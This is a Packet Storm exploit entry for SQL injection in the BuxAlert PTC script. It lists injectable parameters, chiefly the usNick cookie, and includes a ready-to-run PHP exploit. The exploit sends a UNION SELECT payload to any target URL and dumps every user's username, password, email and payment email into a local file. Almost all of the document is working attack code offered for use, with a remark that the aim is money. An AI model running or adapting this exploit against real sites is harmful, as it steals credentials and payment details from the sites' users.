BuxAlert PTC SQL Injection

2013-12-16T00:00:00
ID PACKETSTORM:124443
Type packetstorm
Reporter i-Hmx
Modified 2013-12-16T00:00:00

Description

                                        
                                            `<?  
/*  
[+] BuxAlert PTC  
[+] Sql Injection Exploit  
[+] Vuln & Exploit By i-Hmx  
[+] n0p1337@gmail.com  
[+] sec4ever.com , 1337s.cc  
  
  
I.Sql Injection Vuln  
/referals.php > Inject in cookiws usNick  
usNick=i-Hmx'/*! union all select 1,(select group_concat(username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 and 'faris'='1337  
  
  
require('config.php');  
$lole=$_COOKIE["usNick"];  
$tabla = mysql_query("SELECT * FROM tb_users where referer='$lole' ORDER BY id ASC");  
mysql_close($con);  
while ($row = mysql_fetch_array($tabla)) {  
  
sendsms.php , surf.php , almost all php files are cookies injectable under cookie value usNick  
  
/messenger.php?option=delete&id=1%injecthere%  
  
if ($option=="delete"){  
require ('config.php');  
//Todo parece correcto procedemos con la inserccion  
$queryz = "DELETE FROM tb_messenger WHERE id='$id' LIMIT 1";  
mysql_query($queryz) or die(mysql_error());  
mysql_close($con);  
echo "<font color=\"#cc0000\"><b>Message has been deleted.</b></font><br><br>";  
}  
  
  
/purchase.php  
if (isset($_POST["customer"]))  
{  
$refset=$_POST["refset"];  
require('config.php');  
$queryx = mysql_query("SELECT sets FROM tb_buyref WHERE id='1' and refnum='$refset'") or die(mysql_error());  
  
  
Fuck Injection , it's all abt money anyway :D  
You can control ay user via usNick cookie value  
  
*/  
if(!$argv[1])  
{  
echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/bux/\n";   
exit();  
}  
echo "[+] Bux Alert Sql Injection Exploit \n";  
echo "[-] Exploited By i-Hmx \n";  
echo "[-] sec4ever.com , 1337s.cc\n";  
function kastr($string, $start, $end){  
$string = " ".$string;  
$ini = strpos($string,$start);  
if ($ini == 0) return "";  
$ini += strlen($start);  
$len = strpos($string,$end,$ini) - $ini;  
return substr($string,$ini,$len);  
}  
function faexploit($url){  
$curl=curl_init();  
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);  
curl_setopt($curl,CURLOPT_URL,$url."referals.php");  
curl_setopt($curl,CURLOPT_COOKIE,"usNick=i-Hmx'/*! union all select 1,(select group_concat(0x666172736177797e,username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18*/ and 'faris'='1337");  
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);  
curl_setopt($curl,CURLOPT_TIMEOUT,20);  
$exec=curl_exec($curl);  
curl_close($curl);  
return $exec;  
}  
$kaf=faexploit($argv[1]);  
if(preg_match("/farsawy/",$kaf)){  
$fadata= kastr($kaf,"<tr><td align='center'>","</td><td align='center'>");  
$kdata=str_replace("farsawy~","",$fadata);  
$kadata=str_replace(",","",$kdata);  
@unlink("result.htm");  
$res=fopen("result.htm","w+");  
fwrite($res,"| BuxAlert Sql Injection Vuln<br>| Exploited By i-Hmx<br>| sec4ever.com , 1337s.cc<br>-----------------------------------<br><br>User -- Password ---- Email ---- Paying email<br>".$kadata."<br>------------i-Hmx----------");  
echo "[-] Result have been written to result.htm\n";  
echo "[+] Done";  
}  
else  
{  
echo "[-] Not vulnerable";  
}  
?>   
`